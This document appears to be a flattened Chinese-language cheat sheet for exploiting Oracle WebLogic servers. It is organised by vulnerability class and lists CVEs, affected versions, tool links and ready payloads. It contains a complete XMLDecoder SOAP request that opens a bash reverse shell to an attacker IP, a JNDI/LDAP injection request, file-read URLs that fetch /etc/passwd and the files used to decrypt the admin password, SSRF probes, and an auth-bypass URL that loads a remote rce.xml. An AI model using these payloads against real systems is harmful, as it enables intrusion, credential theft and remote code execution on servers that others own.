S2 |
基于T3协议的漏洞 |
CVE-2015-4582
CVE-2016-0638
CVE-2016-3510
CVE-2018-2628
CVE-2020-2555
CVE-2020-2883
|
这些CVE可以直接用weblogic工具扫描识别出来,工具在右侧已附上 |
https://www.cnblogs.com/nice0e3/p/14201884.html |
https://github.com/rabbitmask/WeblogicScan |
S3 |
基于xml解析的漏洞
|
CVE-2017-3506 CVE-2017-10271
weblogic10.03
|
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.1.15:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 637
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/192.168.1.31/4444 0>&1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
|
https://zhuanlan.zhihu.com/p/33403692
https://blog.csdn.net/qq_29647709/article/details/84928306
|
https://github.com/rabbitmask/WeblogicScan |
S4 |
基于IIOP的漏洞 |
CVE-2020-2551
CVE-2020-14644
|
可利用POC验证漏洞 |
https://xz.aliyun.com/t/7422?page=1
https://github.com/Y4er/CVE-2020-2551
|
https://github.com/rabbitmask/WeblogicScan |
S5 |
基于LDAP的漏洞 |
CVE-2021-2109
WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0
|
1.未授权访问地址:http://ip:7001/console/css/%252e%252e%252f/consolejndi.portalPOST /console/css/%252e%252e/consolejndi.portal?
2.启动LDAP:https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11 unzip JNDIExploit.v1.11.zip java -jar JNDIExploit.v1.11.jar -i ip(攻击机地址)启动
3.漏洞利用:
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://81.70.146;55:1389/cqubba;AdminServer%22) HTTP/1.1 Host: ip:7001 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
|
https://dyblogs.cn/dy/2404.html |
https://github.com/welk1n/JNDI-Injection-Exploit |
S6 |
任意文件上传 |
10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3
|
begin.do页面上传漏洞
http://IP:7001/ws_utc/resources/ws/config/import?timestamp=1532403983779
config.do页面上传漏洞
真正存在上传漏洞的地址:
http://IP:7001/ws_utc/config.do
|
https://www.freebuf.com/vuls/178510.html
|
|
S7 |
任意文件读取+文件上传 CVE-2019-2618 |
WebLogic 10.3.6.0、12.1.3.0、12.2.1.3 |
1.任意文件读取
访问url (http://IP:7001/hello/file.jsp?path=/etc/passwd) , 成功读取到账号和密码
weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml。SerializedSystemIni.dat是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,这就是密钥,右键copy to file就可以保存成一个文件:
http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
config.xml是base_domain的全局配置文件,所以乱七八糟的内容比较多,找到其中的的值,即为加密后的管理员密码(需要下载工具进行解密)
http://yourIP:7001/hello/file.jsp?path=config/config.xml
|
https://www.jianshu.com/p/7d14e45a96e7 |
https://github.com/TideSec/Decrypt_Weblogic_Password |
S8 |
SSRF |
10.0.2~10.3.6 |
http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:1234
http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
|
https://dyblogs.cn/dy/2275.html
https://www.cnblogs.com/-mo-/p/11503707.html
|
|
S9 |
权限绕过+命令执行 |
Weblogic_CVE-2020-14882/14883 |
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
|
https://blog.csdn.net/weixin_28975553/article/details/116535611
https://www.anquanke.com/post/id/221752
|
|
|
|
|
|
|
|
|
|
|
|
|
|